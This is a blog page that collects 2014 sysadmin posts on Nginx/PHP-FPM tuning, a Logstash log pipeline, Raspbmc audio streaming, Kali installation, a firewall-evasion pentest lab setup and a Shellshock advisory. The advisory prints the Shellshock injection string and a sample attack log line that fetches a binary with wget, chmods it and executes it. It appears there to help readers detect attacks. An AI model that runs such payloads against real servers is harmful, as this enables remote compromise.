khanhnnvn

phpize – Cannot find autoconf. Please check your autoconf installation and the $PHP_AUTOCONF environment variable. Then, rerun this script.

Linux
Oct 10, 2014
 

You may encounter the following error:


# phpize
Configuring for:
PHP Api Version:         20090626
Zend Module Api No:      20090626
Zend Extension Api No:   220090626
Cannot find autoconf. Please check your autoconf installation and the
$PHP_AUTOCONF environment variable. Then, rerun this script.

Solution: 
# yum install autoconf
Re-run the phpize command and the issue will be fixed.
# phpize
Configuring for:
PHP Api Version:         20090626
Zend Module Api No:      20090626
Zend Extension Api No:   220090626
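
Once phpize succeeds, the usual next steps build and install the extension. A minimal sketch, assuming you are inside the extension's source directory:

# ./configure
# make
# make install

Then enable the extension in php.ini and restart the web server or PHP-FPM.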

Centralized Logs Management with Logstash, ElasticSearch, and Redis

Monitoring, Solution
Oct 08, 2014
 

Deploying a Centralized Logs Management System seems very easy these days with these great tools:

+ Logstash: collects, indexes, processes, and ships logs
+ Redis: receives logs from log shippers
+ ElasticSearch: stores logs
+ Kibana: web interface with graphs, tables…

We will implement the logs management system with the following architecture:




In this tutorial, I deploy only one shipper (the nginx logs of my Django app) on one machine, and one server acting as the logs indexer (Redis, Logstash, ElasticSearch, Kibana):


1. On the indexer server, install and run Redis:

http://iambusychangingtheworld.blogspot.com/2013/11/install-redis-and-run-as-service.html
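
If you prefer not to follow the link, a minimal sketch on Ubuntu (package and service names assumed from the distribution repositories):

$ sudo aptitude install redis-server
$ sudo service redis-server start
$ redis-cli ping      # should answer PONG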

2. On the indexer server, install and run ElasticSearch:

$ sudo aptitude install openjdk-6-jre
$ wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.7.deb
$ sudo dpkg -i elasticsearch-0.90.7.deb
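
The .deb package registers an init script, so you can start ElasticSearch and confirm it answers on its default port (9200); a quick sketch:

$ sudo service elasticsearch start
$ curl http://localhost:9200/      # should return a JSON banner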


3. On the indexer server, download Logstash, create its config, and run it to fetch logs from Redis and store them in ElasticSearch:

+ Download Logstash:

$ sudo mkdir /opt/logstash /etc/logstash
$ cd /opt/logstash
$ sudo wget https://download.elasticsearch.org/logstash/logstash/logstash-1.2.2-flatjar.jar


+ Create the Logstash config file /etc/logstash/logstash-indexer.conf with the following content:

input {
        redis {
                host => "127.0.0.1"
                data_type => "list"
                key => "logstash"
                codec => json
        }
}
output {
        elasticsearch {
                embedded => true
        }
}


+ Run Logstash; this will also activate the Kibana web interface on port 9292:

$ java -jar /opt/logstash/logstash-1.2.2-flatjar.jar agent -f /etc/logstash/logstash-indexer.conf -- web


4. On the shipper machine (my computer), download Logstash, and create a config file for Logstash to ship my Django app's logs to the indexer server:

+ Download Logstash:

$ sudo mkdir /opt/logstash /etc/logstash
$ cd /opt/logstash
$ sudo wget https://download.elasticsearch.org/logstash/logstash/logstash-1.2.2-flatjar.jar

+ Create a config file at /etc/logstash/logstash-shipper.conf for Logstash to ship the log files to Redis on the indexer server:

input {
        file {
                path => "/home/projects/logs/*ecap.log"
                type => "nginx"
        }
}
output {
        redis {
                host => "indexer.server.ip"
                data_type => "list"
                key => "logstash"
        }
}



+ Run Logstash:

$ java -jar /opt/logstash/logstash-1.2.2-flatjar.jar agent -f /etc/logstash/logstash-shipper.conf
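
Before checking Kibana, you can verify that events are actually flowing by asking Redis on the indexer for the length of the logstash list; a sketch (substitute your indexer's address):

$ redis-cli -h indexer.server.ip llen logstash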


5. From any machine on my network, open a browser and access the Kibana web interface to manage all the logs:




From now on, if I want to monitor any service's logs, I just need to run a Logstash instance on the server running that service.


But there is one annoying thing: CPU usage on the indexer server is very high. That's because I'm running all the services (Logstash, Redis, ElasticSearch, Kibana) on the same server, and the Java processes consume a lot of CPU. Look at the following htop screenshots and you will see:

  • Indexer server, before running all the services:



  • Indexer server, after running all the services:




These are all listening ports on the indexer server:


Some ElasticSearch tuning may be helpful: http://jablonskis.org/2013/elasticsearch-and-logstash-tuning/




References:
[0] http://michael.bouvy.net/blog/en/2013/11/19/collect-visualize-your-logs-logstash-elasticsearch-redis-kibana/
[1] http://logstash.net/docs/1.2.2/tutorials/getting-started-centralized
[2] http://logstash.net/docs/1.2.2/tutorials/10-minute-walkthrough/

Optimizing Nginx

Nginx
Oct 03, 2014
 

I – Optimizing Nginx:
1) Reorganizing the configuration files:
Nginx configuration files are normally stored in the /etc/nginx directory. A better way to organize them, in the style of Apache, is as follows:

## Main configuration file ##
/etc/nginx/nginx.conf
## Virtual host configuration files ##
/etc/nginx/sites-available/
/etc/nginx/sites-enabled/
## Other configuration files ##
/etc/nginx/conf.d/

The virtual host configuration is split across two main directories:
  • sites-available: holds every configuration file you currently have: complete configurations, temporary ones, broken ones, and so on.
  • sites-enabled: holds symbolic links pointing to the complete, optimized configuration files in sites-available.
Since the virtual host configuration files are stored separately, we need to include their directories in the main configuration file. In nginx.conf we add:

## Virtual host configuration files ##
include /etc/nginx/sites-enabled/*;
## Other configuration files ##
include /etc/nginx/conf.d/*;

Note: this reorganization only makes the web server easier to manage; it has no effect on performance.
2) Tuning worker_processes:
With the default configuration, Nginx uses one CPU to handle its workload. Depending on how busy the web server is, you may want to change this setting. For example, web servers that make heavy use of SSL or gzip should set worker_processes higher. If your website serves a large number of static files whose combined size exceeds the available RAM, increasing worker_processes will make better use of the system's disk bandwidth.
To determine the number of CPU cores on the system, run:

# cat /proc/cpuinfo | grep processor

[root@server ~]# cat /proc/cpuinfo | grep processor
processor    : 0
processor    : 1
processor    : 2
processor    : 3

As shown above, our CPU has 4 cores. To change how much CPU Nginx uses, edit the main configuration file:

# vi /etc/nginx/nginx.conf

On line 3, change the value of worker_processes to 4.
nginx-php-fpm-config-2
3) Tuning worker_connections:
worker_connections specifies how many connections each worker process will handle. By default this is set to 1024. To see your system's limit, use the ulimit command:

# ulimit -n
nginx-php-fpm-config-3
The value you set for worker_connections should be less than or equal to this limit!
If you have already adjusted worker_processes so Nginx uses more cores, the maximum number of clients is given by:

max_clients = worker_processes * worker_connections
4) Tuning the buffers:
One of the most important Nginx optimizations is setting the buffer sizes. If the buffers are too small, a bottleneck can easily occur when the web server receives a large amount of traffic. To change these values, add the following lines to the http block of the main configuration file nginx.conf:

client_body_buffer_size 8K;
client_header_buffer_size 1k;
client_max_body_size 2m;
large_client_header_buffers 2 1k;

Where:
  • client_body_buffer_size: sets the buffer size for the request body sent by the client. If the requested size is larger than the buffer, the body is stored in a temporary file.
  • client_header_buffer_size: sets the buffer size for the request header sent by the client. A size of 1k is normally enough.
  • client_max_body_size: sets the maximum body size a client may send, as determined by the Content-Length header line. If the requested body size exceeds this limit, the client receives the "Request Entity Too Large" (413) error.
  • large_client_header_buffers: sets the number and maximum size of the buffers used to read large request headers. If the client sends an oversized header line, Nginx returns "Request-URI Too Large" (414), or "Bad Request" (400) if the request header is too long.
We should also set the timeout values to optimize how the web server performs with clients:

client_body_timeout     10;
client_header_timeout   10;
keepalive_timeout       15;
send_timeout            10;
Where:
  • client_body_timeout: sets the time allowed for reading the request body from the client. If it is exceeded, the client receives the "Request Timeout" (408) error.
  • client_header_timeout: sets the time allowed for reading the request header from the client. If it is exceeded, the client receives the "Request Timeout" (408) error.
  • keepalive_timeout: sets how long a keep-alive connection from a client stays open; after this timeout the connection is closed.
  • send_timeout: sets the time allowed for transmitting a response to the client; if it is exceeded, nginx shuts down the connection.
5) Disabling access logs:
By default, Nginx logs every request to a file on disk. If you do not use the access logs, you can disable this feature to reduce I/O time. To do so, set the following value in the server block of the main configuration file nginx.conf:

access_log off;
6) Compressing outgoing data with gzip:
Gzip compresses data before sending it to the client. This is one way to speed up access to our website. In the http block of the main configuration file nginx.conf we can add:

gzip              on;
gzip_comp_level   2;
gzip_min_length   1000;
gzip_proxied      expired no-cache no-store private auth;
gzip_types        text/plain application/xml;
gzip_disable      "MSIE [1-6].";
7) Caching static content:
Most client requests to our website load static content: images, JavaScript, CSS, Flash, and so on. We should have Nginx cache these static files:

location ~* "\.(js|ico|gif|jpg|png|css|html|htm|swf|htc|xml|bmp|cur)$" {
    root            /home/site/public_html;
    add_header      Pragma "public";
    add_header      Cache-Control "public";
    expires         3M;
    access_log      off;
    log_not_found   off;
}
8) Hiding the Nginx version:
Hiding the Nginx version in the Server header makes our web server a little more secure. To do this, add the following line to the http block of the main configuration file nginx.conf:

server_tokens off;
9) Executing PHP files through PHP-FPM:
Here we can use the default TCP/IP stack or use a Unix socket connection directly. We can also have PHP-FPM listen on an IP:port pair (usually 127.0.0.1:9000):

location ~* \.php$ {
    try_files       $uri /index.php;
    fastcgi_index   index.php;
    fastcgi_pass    127.0.0.1:9000;
    #fastcgi_pass   unix:/var/run/php-fpm/php-fpm.sock;
    include         fastcgi_params;
    fastcgi_param   SCRIPT_FILENAME    $document_root$fastcgi_script_name;
    fastcgi_param   SCRIPT_NAME        $fastcgi_script_name;
}

PHP-FPM and Nginx can even be separated to run on different servers.
10) Blocking access to hidden files in Nginx:
Web directories sometimes contain hidden files (names starting with a dot ".") such as .svn or .htaccess. These files are not meant to be public. To block access to them, we can add the following configuration:

location ~ /\. {
    access_log      off;
    log_not_found   off;
    deny            all;
}
II – Optimizing PHP-FPM
1) Reorganizing the configuration files:
PHP-FPM is normally configured through /etc/php-fpm.conf and the /etc/php-fpm.d directory. Any other PHP-FPM configuration files should be placed in the same /etc/php-fpm.d directory. We can add the following line to php-fpm.conf to make that happen:

include=/etc/php-fpm.d/*.conf
2) Configuring multiple PHP-FPM pools:
With PHP-FPM we can create separate pools for the different websites on the web server. This way each website gets its own resource allocation and its own owner and group. As an example, here I create 3 pools for 3 different websites:
/etc/php-fpm.d/site.conf
/etc/php-fpm.d/blog.conf
/etc/php-fpm.d/forums.conf
Sample configurations:
/etc/php-fpm.d/site.conf
[site]
listen = 127.0.0.1:9000
user = site
group = site
request_slowlog_timeout = 5s
slowlog = /var/log/php-fpm/slowlog-site.log
listen.allowed_clients = 127.0.0.1
pm = dynamic
pm.max_children = 5
pm.start_servers = 3
pm.min_spare_servers = 2
pm.max_spare_servers = 4
pm.max_requests = 200
listen.backlog = -1
pm.status_path = /status
request_terminate_timeout = 120s
rlimit_files = 131072
rlimit_core = unlimited
catch_workers_output = yes
env[HOSTNAME] = $HOSTNAME
env[TMP] = /tmp
env[TMPDIR] = /tmp
env[TEMP] = /tmp
/etc/php-fpm.d/blog.conf
[blog]
listen = 127.0.0.1:9001
user = blog
group = blog
request_slowlog_timeout = 5s
slowlog = /var/log/php-fpm/slowlog-blog.log
listen.allowed_clients = 127.0.0.1
pm = dynamic
pm.max_children = 4
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
pm.max_requests = 200
listen.backlog = -1
pm.status_path = /status
request_terminate_timeout = 120s
rlimit_files = 131072
rlimit_core = unlimited
catch_workers_output = yes
env[HOSTNAME] = $HOSTNAME
env[TMP] = /tmp
env[TMPDIR] = /tmp
env[TEMP] = /tmp
/etc/php-fpm.d/forums.conf
[forums]
listen = 127.0.0.1:9002
user = forums
group = forums
request_slowlog_timeout = 5s
slowlog = /var/log/php-fpm/slowlog-forums.log
listen.allowed_clients = 127.0.0.1
pm = dynamic
pm.max_children = 10
pm.start_servers = 3
pm.min_spare_servers = 2
pm.max_spare_servers = 4
pm.max_requests = 400
listen.backlog = -1
pm.status_path = /status
request_terminate_timeout = 120s
rlimit_files = 131072
rlimit_core = unlimited
catch_workers_output = yes
env[HOSTNAME] = $HOSTNAME
env[TMP] = /tmp
env[TMPDIR] = /tmp
env[TEMP] = /tmp
3) Configuring the PHP-FPM pool process manager (pm):
To manage PHP-FPM processes we should use dynamic process management, so processes are only started when needed. The settings here are analogous to the worker_processes and worker_connections parameters of Nginx discussed above. Configure them according to the traffic your website receives and the amount of RAM your web server has.
Suppose our web server has 512 MB of RAM. At times of high traffic we check the memory currently in use (with top, for example) and find that PHP-FPM is allocated 220 MB, with each of its processes using 24 MB. We can then calculate max_children as 220/24 = 9.17.
So the pm.max_children value we should set for this web server is 9.
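
To measure the per-process figure on your own server, something like the following works; a rough sketch (in ps -l -y output, RSS in KB is the eighth column):

$ ps -ylC php-fpm --sort=rss | awk 'NR>1 {sum+=$8; n++} END {if (n) printf "%d processes, avg %.1f MB each\n", n, sum/n/1024}'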
In the website's pool configuration file we could then have:

pm.max_children = 9
pm.start_servers = 3
pm.min_spare_servers = 2
pm.max_spare_servers = 4
pm.max_requests = 200

By default, the number of requests each process may handle is unlimited. However, it is wise to set it to a definite value to avoid memory problems; in the example above, pm.max_requests is set to 200.

Streaming Audio From Linux to Raspbmc

Solution
Sep 29, 2014
 
Early in 2014, I finally got around to turning my Raspberry Pi into a little XBMC media centre by installing Raspbmc. Which was fun. And also easy.
Perhaps a little too easy: I'm a bit of a nerd, so it didn't take long to get bored of just playing regular type media off the external hard drive. Part of the reason I have a Raspberry Pi is for the fun of thinking of what relatively useless thing I might potentially do with it next, and then spending (wasting?) many hours trying to do it.
So, as I was trying to decide what to do next, I considered the fact that I fairly often like to play music on my PC while I’m working. And my sound system is now hooked up to the Raspberry Pi. So it would be most convenient if I could just deliver the sound across my network for Raspbmc to play for me. I was running Ubuntu 13.10 – Saucy Salamander – at the time.
This turned out to be a lot harder than you might imagine. Excellent. (Disclaimer: this was in 2014 – I suppose it might be easier now … if so, I apologise for the convenience).

Option 1: PulseAudio Network Streaming

Ubuntu uses PulseAudio by default for soundy things. So that is where I started my quest. If you pop open paprefs (installing it first, if it’s not there), you will notice that it claims to be able to do things over a network.
paprefs-network
Here is a link to the incomprehensible documentation about it:  NetworkSetup. At least, it was incomprehensible when I first read it. It now makes a little bit more sense – but I assume that you are at the start of your journey if you are even reading this – so it probably won’t make much sense to you. Alternatively you could have a read of this blog that claims to make network audio with PulseAudio (somewhat) easy.
However, I decided to abandon this idea:
  1. Raspbmc doesn't install with PulseAudio by default – and you would need it to be running in server mode – and at the time of writing the people of the internet seemed to be having some trouble getting the two to play together.
  2. I wanted something that was more integrated with the XBMC user interface – rather than just something running in parallel.

Option 2: Apple AirPlay

Perhaps, like me, you noticed that paprefs has a greyed-out option: "Make discoverable Apple AirTunes sound devices available locally". That is interesting. Especially since you can set your XBMC up to be a target for Apple AirPlay sources – making it look like a set of AirPlay speakers to any iDevices on your network. I tested it out with an iPod Touch – and it worked really nicely.
xbmc-airplay
But how to get that option un-greyed-out? The internet suggested the following (might have been nice for paprefs to give me a hint):
sudo apt-get install pulseaudio-module-raop
Now you can try it out:
paprefs-airplay
This will add a new audio device that you can select from your Sound Settings page, with the name of your XBMC. However, if you are like me, you may discover that it does not work. At all. Except to produce a stream of nasty, choppy, ear-burning noise.
You might even be persistent and try out Pulseaudio-raop2. In which case, if you are like me, you will discover that it, too, does not work, and also crashes quite a lot (which is fair – since it is experimental).

Option 3: Multicast/RTP

I put this in for completeness' sake. I didn't get very far in investigating it as an option. I did a couple of experiments trying to get it to work between two Linux PCs before attempting it with the Raspberry Pi, and was getting very choppy sound – so I abandoned it and moved on.

Option 4: DLNA/UPnP

My final, and successful(!), attempt involved DLNA/UPnP media streaming. On the paprefs Network Server tab was another greyed-out option: "Make local sound devices available as DLNA/UPnP Media Server".
But how to get it un-greyed-out? The internet suggested the following (might have been nice for paprefs to give me a hint):
sudo apt-get install rygel
paprefs-upnp
This too adds a new audio device that you can select:
sound-settings
Now go to your XBMC File Manager and look for a new UPnP device to add as a Source:
xbmc-upnp-browse
Unfortunately, you are likely to find nothing there.
Hmm.
Turns out that you have two problems:
  1. Rygel isn’t running – you need to start it manually from a shell (rygel), or set up init scripts yourself (I didn’t bother);
  2. Rygel needs to be configured to actually publish PulseAudio’s stream using ‘GstLaunch‘. Obviously.
To configure Rygel, you'll need to edit one of its configuration files. Rygel can be configured globally (/etc/rygel.conf) or per-user ($HOME/.config/rygel.conf). I just edited the global one.
Find the GstLaunch section, and add some config like this* (in my default install it was disabled):
[GstLaunch]
enabled=true
launch-items=mypulseaudiosink
mypulseaudiosink-title=Audio on @HOSTNAME@
mypulseaudiosink-mime=audio/flac
mypulseaudiosink-launch=pulsesrc device=upnp.monitor ! flacenc
* Courtesy of dpc’s blog.
That setup gets Rygel to publish a new stream called ‘GstLaunch/Audio on <my pc>’. The stream will be publishing whatever sound is produced by the PulseAudio ‘upnp.monitor’ source – which is what all of those paprefs settings were actually enabling. It will also transcode that audio stream to FLAC, which is lossless, but also compressed enough to work fine over my WiFi without causing trouble – and with only a couple of seconds of buffering required on the other end.
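If you'd rather not start rygel by hand each time (problem 1 above), here is a sketch of one way to do it: a per-user autostart entry following the freedesktop autostart convention (paths assumed):

$ mkdir -p ~/.config/autostart
$ cat > ~/.config/autostart/rygel.desktop <<'EOF'
[Desktop Entry]
Type=Application
Name=Rygel
Exec=rygel
EOF

After the next login, rygel should already be running before you go looking for the UPnP source in XBMC.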
Now you can add the GstLaunch item as a source through your XBMC File Manager:
xbmc-upnp-finding-gstlaunch
Now you are able to select your PC's audio as a stream and connect to it:
my-audio
Finally, your XBMC is playing your PC’s audio through your sound system. Hooray!
my-audio-playing
http://westmarch.sjsoft.com/

What You Need to Know About the Dangerous "bash" Vulnerability (CVE-2014-6271)

Security
Sep 28, 2014
 

What is the "bash" vulnerability (CVE-2014-6271)?

The "bash" security vulnerability, described under the identifier CVE-2014-6271, is an extremely dangerous flaw because of its wide impact and how easy it is to exploit. An attacker can easily run system commands with the privileges of the exploited service.
In most of the exploitation seen on the Internet today, attackers remotely attack web servers hosting CGI scripts written in bash.
At the time of this writing, the vulnerability has already been used for malicious purposes: infecting vulnerable servers with malware and in attacks by hackers. Researchers are continuously collecting new samples and indicators of compromise via this vulnerability; detailed information about this malware will be published soon.
It is important to understand that the vulnerability is not tied to one specific service, for example Apache or nginx. Rather, it lies in the bash shell interpreter, and allows an attacker to append system commands to the environment variables that bash uses.

How does the "bash" vulnerability work?

Let's use an example similar to the ones seen in the advisories and published proof-of-concept exploit code to explain how the vulnerability works. When you have a CGI script on a web server, this script automatically reads certain environment variables, for example your IP address, your web browser version, and information about the local system.
But imagine that you could pass not just ordinary system information to the CGI script, but could also make it run commands at the system level. That means that without any credentials on the web server, just by accessing the CGI script you can have it read these environment variables, and those environment variables can contain strings that will be interpreted and executed as the commands you specify on the server.

What makes this vulnerability unique and dangerous?

The vulnerability is dangerous because it is very easy to exploit, especially since the number of vulnerable targets is very large. It affects not only web servers but any software that uses the bash interpreter and reads your data.
Researchers are still trying to determine whether interpreters such as PHP, JSP, Python, or Perl are affected. Depending on how the code is written, an interpreter sometimes uses bash to run certain functions; in such cases, other interpreters may also be vulnerable to CVE-2014-6271.
The impact is very large because so many embedded devices use CGI scripts, for example routers, home appliances, and wireless access points. In many cases this vulnerability is very hard to patch.

How widespread is the vulnerability?

It is hard to gauge how widespread it is, but according to Kaspersky experts, as soon as the vulnerability was announced many people developed exploit tools and related malware; both black-hat and white-hat hackers are scanning the Internet for servers vulnerable to the flaw. Many exploits are being developed that target local files and network daemons. There have also been discussions about OpenSSH and DHCP clients being vulnerable to this type of attack.

How do I check whether my system/website is affected?

The simplest way to check whether your system is vulnerable is to open a bash shell on it and run the following command:

"env x='() { :;}; echo vulnerable' bash  -c "echo this is a test"

If the shell returns the string "vulnerable", you should update your system. There are also other tools that check for this vulnerability by attempting to exploit your system.

What is the advice on patching?

The first thing you should do is update your version of bash. The various Linux distributions have released patches for this vulnerability, but not all of the patches have proven fully effective, so updating is only the first step.
If you use any IDS/IPS, we also recommend adding/loading a signature for this attack; many public rules have been published. Also review your web server configuration: if there are any CGI scripts, disable them.

Is this a threat to online banking?

This vulnerability is being exploited to target servers hosted on the Internet. Even some workstations running Linux and OS X are affected, but an attacker would first have to find a new attack vector that can be exploited remotely on your computer.

The vulnerability does not target individuals; its targets are servers on the Internet. But that also means that if the website of an e-commerce company or a bank you use is attacked, your personal information could in theory be compromised as well. At the time of this writing it is hard to say exactly which platforms will be vulnerable and targeted, but we recommend not using your credit card or sharing sensitive information in the coming days, until security researchers find out more about the situation.

Is it possible to detect whether someone is exploiting this vulnerability?

We recommend reviewing your HTTP logs and checking for anything suspicious. An example of a malicious pattern:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0"  400 349 "() { :; }; 
wget -O /tmp/besh http://192.168.1.1/filename; chmod 777  /tmp/besh; /tmp/besh;"
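
A quick way to hunt for that pattern is to grep your access logs for the telltale "() {" marker; a sketch, with the log paths being assumptions that depend on your web server:

grep '() {' /var/log/nginx/access.log /var/log/apache2/access.log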

In addition, there are patches for bash that log every command line passed to the bash interpreter. That is an effective way to find out whether someone is exploiting your machine. It will not stop attackers, but it will record their activity on the system.

How serious is this threat?

The vulnerability is truly dangerous, but not every system is vulnerable. Specific conditions must be met, for example a server running services that can be exploited. One of the biggest problems now is that as patches are published, researchers keep finding other ways to exploit bash, discovering other conditions that allow exploitation, and so on. A patch may help prevent execution of malicious code but can do nothing about, say, a malicious file overwrite. So there will probably be a long series of successive patches for bash.

Is this the new Heartbleed?

It is easier for attackers to exploit than Heartbleed. With Heartbleed an attacker could steal data from memory and look for interesting information in it. The bash vulnerability, by contrast, can give the attacker control of the whole system, so it appears to be much more dangerous than Heartbleed.

Could it be used in future APT attacks?

It could be used to build automated malware that checks whether a device has the bug, spreads across systems, and carries out attacks in some way.

Source: securitydaily.net

Top 10 PHP frameworks for 2014

Programming
Sep 28, 2014
 
PHP frameworks are super useful tools when it comes to clean and structured web development, as they speed up the creation and maintenance of your PHP web applications. In this article, I have compiled (in no particular order) my 10 favorite PHP frameworks.

Laravel


Probably the most popular PHP framework right now. Laravel is powerful and elegant while still being easy to learn and use. Definitely worth giving a try!
 More info/download

Flight


Flight is a fast, simple, extensible micro framework for PHP which enables you to quickly and easily build RESTful web applications. Easy to use and to learn, simple yet powerful.
 More info/download

Yii


Yii is a high-performance PHP framework for developing Web 2.0 applications. Yii comes with rich features: MVC, DAO/ActiveRecord, I18N/L10N, caching, authentication and role-based access control, scaffolding, testing, etc.
 More info/download

Medoo


Medoo is the lightest PHP database framework, as it consists of only one file of 10.9 KB. A great micro framework for small and simple applications.
 More info/download

PHPixie


Originally a fork of the Kohana framework, PHPixie is among my favorite new frameworks: MVC compliant, fast to learn, powerful. You should try it sometime soon!
 More info/download

CodeIgniter


Although it is a bit old and reaching the end of its life, I definitely love CI, which is a great MVC framework. I've used it countless times on many projects and I was never disappointed.
 More info/download

Kohana


Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be swift, secure, and small.
 More info/download

Symfony


Created in 2005, Symfony is a very powerful MVC framework and is quite popular in the enterprise world. It was heavily inspired by other Web Application Frameworks such as Ruby On Rails, Django, and Spring. Symfony is probably one of the most complete PHP frameworks.
 More info/download

Pop PHP


While some PHP frameworks are pretty complex and intense, Pop has been built with all experience levels in mind. Pop has a manageable learning curve to help beginners get their feet wet with a PHP framework, but also offers robust and powerful features for the more advanced PHP developer.
 More info/download

Phalcon


Phalcon is an open source, full stack framework for PHP 5 written as a C-extension, optimized for high performance. You don’t need to learn or use the C language, since the functionality is exposed as PHP classes ready for you to use. Phalcon also is loosely coupled, allowing you to use its objects as glue components based on the needs of your application.
 More info/download

Ethical Hacking with Kali Linux Part-1

Linux, Pentest, Security
Sep 26, 2014
 

Ethical Hacking Course Part 1: Kali Linux Introduction & Installation

URL: http://kungfuhacking.blogspot.in

What is Kali Linux?
  • Kali Linux is the most preferred operating system for professionals.
  • Kali is an advanced Linux-based operating system, a collection of open source software that is used to perform different tasks within penetration testing, computer forensics, and security audits. 
  •  Kali Linux contains over 300 penetration testing and assessment tools.
  • Kali supports a variety of additional hardware such as wireless receivers and PCI hardware. 
  • It provides a full-fledged development environment in C, Python, and Ruby.
  • It is customizable and open source.
  • Kali comes as a downloadable ISO that can be used either as a live or a standalone operating system.





Kali Linux Installation:-
  • To begin the installation, we need to download Kali Linux. Kali Linux is available in the following formats:

          ISO files based on system architecture (x86 and x64)
          VMware images
          ARM images
  • Kali can be either installed as a dual boot with your existing operating system, or it can be set up as a virtual machine. Let us begin the process of dual boot installation first. In three easy steps, you can install Kali Linux on your system as a dual boot option.

Step 1 – Download and Boot:- 

  • Before you install Kali, you will need to check whether you have all of the following required elements:



                        Minimum 12 GB of disk space
                        At least 1 GB of RAM for optimum performance
                        A bootable device such as an optical drive or USB

  • Once you have checked the requirements, you can download a bootable ISO from its official website, http://www.kali.org/downloads/
  • Once the download is complete, we will have to burn it to a disk or USB. The disk/USB should be made bootable so that the system can load the setup from it.
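
One way to make the USB bootable from an existing Linux machine is dd; a sketch, where the ISO name and /dev/sdb are assumptions. Double-check the device with lsblk first, because dd overwrites it:

# dd if=kali-linux-amd64.iso of=/dev/sdb bs=1M
# sync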


Step 2 – Setting the Dual Boot:-


  •   Once our bootable media are ready, we are set to restart the system and boot from our disk/USB. 
  • We will begin by selecting the Live boot option. The operating system will start loading and, within a few minutes, we will have our first look at the Kali desktop.
  • Once the desktop is loaded, navigate to Applications | System Tools | Administration | GParted Partition editor. 
  • This will present a GUI representation of the partition of your current operating system. Carefully resize it to leave enough space (12 GB minimum) for the Kali installation. 
  • Once the partition has been resized on the hard disk, ensure you select the Apply All Operations option. Exit GParted and reboot Kali Linux.

   Step 3 – Beginning with the Installation:-

  • Once we are back to the home screen, select Graphical install. The initial few screens of the installation will ask you for language selection, location selection, keyboard, and so on. We need to be careful while setting up the root password. The default root password for Kali is toor.
  • (Dual boot only) Once we are through with this, the next important step is selecting the partition to install the operating system to. We will have to use the same unallocated space that we created moments ago using GParted.
  • Once the partition is selected, Kali will take over and install the operating system. The process will take some time to complete. After the installation is complete, the system startup screen will give you the option to boot either into Kali Linux or your other operating system, which is called a dual boot configuration.

Installing Kali as a virtual machine:-

  • For beginners, I suggest installing Kali in virtualization software.
  • Setting up Kali over virtualization software is easy. Kali officially provides a VMware image that can be downloaded from its official website (http://www.offensive-security.com/kali-linux-vmware-arm-image-download/). Once imported into VMware Player, it is ready to use.
  • So we are going to install Kali Linux in VMware Workstation. See Part 1 for the practical walkthrough.

Bypassing Firewalls and Avoiding Detection

Pentest, Security
Sep 26, 2014
 
The type and scope of the penetration test will determine the need for being stealthy during a penetration test. The reasons to avoid detection while testing are varied; one of the benefits would include testing the equipment that is supposedly protecting the network, another could be that your client would like to know just how long it would take the Information Technology team to respond to a targeted attack on the environment.

Not only will you need to be wary of the administrators and other observers on the target network, you will also need to understand the automated methods of detection such as web application, network, and host-based intrusion detection systems that are in place to avoid triggering alerts.

NOTE:- When presented with the most opportune target, take the time to validate that it is not some sort of honeypot that has been set up to trigger alerts when abnormal traffic or activity is detected! No sense in walking into a trap set by a clever administrator. Note that if you do find a system like this, it is still very important to ensure it is set up properly and not inadvertently allowing access to critical internal assets due to a configuration error!

Lab preparation:-

The Kali Linux, pfSense, and Metasploitable virtual machines should be configured in the following manner:

Kali Linux guest machine:-

This machine will need to be connected to the 192.168.10.0/24 subnet. In the Oracle VM VirtualBox Manager console, highlight the Kali Linux instance and select the Settings option from the top navigation bar. Ensure that only one network adapter is enabled. The adapter should use the VLAN1 internal network option.

Now power on your Kali machine and configure the IP address manually as follows:
#ifconfig eth0 192.168.10.10 netmask 255.255.255.0 

As the pfSense machine will need to be our router as well, we need to set it up as the default gateway. This can be accomplished as follows:
# route add default gw 192.168.10.1 


Metasploitable guest machine:-

The Metasploitable machine will be used as the target. It needs to be configured to connect to VLAN2, which is a new internal network we have not used before. To create an internal network you will need to manually type VLAN2 into the network configuration screen in the Oracle VM VirtualBox Manager. Your settings should be similar to the following:


pfSense network setup:-

Configuring our firewall is a bit more work. It needs to be able to route restrictive traffic from the VLAN1 network to the VLAN2 subnet. There are several configuration changes we will need to make to ensure this works properly.

Our firewall guest machine will use two network adapters. One will be used for the VLAN1 segment and the other for the VLAN2 segment. VLAN1 will be treated as an untrusted wide area network for the examples within this chapter. Network Adapter 1 should resemble the following screenshot:


Network Adapter 2 should be similar to the following:


pfSense WAN IP configuration:-

The remaining networking setup will need to be performed from within the guest machine.

1. Boot up your pfSense virtual instance. There may be an additional delay as pfSense attempts to configure the WAN adapter. Allow it to fully load until you see the following menu:




2. The WAN and LAN interfaces will need to be configured properly. Select option 2) Set interface(s) IP address.

3. Select option 1 – WAN.


4. When asked to configure the WAN interface via DHCP, type n for no.
5. The IP for the WAN adapter should be 192.168.10.1.
6. The subnet bit count should be set to 24. Type 24 and press Enter.
7. Next, set the default gateway; in our case 192.168.10.1.
8. Next it will ask about IPv6; in our case type n and press Enter.
9. Finally, you will see the screen below:


10. Press Enter again to return to the configuration menu.

Your LAN and WAN IP ranges should match the following:


pfSense LAN IP configuration:-

We can set up the LAN IP information from the configuration menu as well. One benefit of configuring the LAN here is that we can have a DHCP server configured for VLAN2 at the same time.

1. Select option 2 from the configuration menu to start the LAN IP Configuration module.
2. Choose the LAN interface (Option 2).
3. When prompted to enter the IP address type 192.168.20.1.
4. The bit count should be set to 24.

5. Next, set the default gateway; in our case 192.168.20.1.
6. When asked if you would like a DHCP server to be enabled on LAN, choose y for yes.
7. The DHCP client IP range start will be 192.168.20.10.
8. The DHCP client IP range stop will be 192.168.20.50.



 9. Press Enter again to return to the configuration menu. Your LAN and WAN IP ranges should match the following:


 Firewall configuration:-

pfSense can be configured using its intuitive web interface. Boot up the Kali Linux machine with VLAN2, open a terminal and perform a sudo dhclient to pick up an address from the pfSense DHCP server on VLAN2 (192.168.20.0/24).

In a web browser on the Kali machine, type http://192.168.20.1/ to access the configuration panel. If you have reset to factory defaults you will need to step through the wizard to get to the standard console.

Note:-The default username and password combination for pfSense is: admin/pfsense

To view the current firewall rules choose Firewall | Rules and review the current configuration. By default, the WAN interface should be blocked from connecting internally, as there are no pre-established rules that allow any traffic through.




For testing purposes, we will enable ports 80, 443, and 21, and allow ICMP. Add the rules as follows:
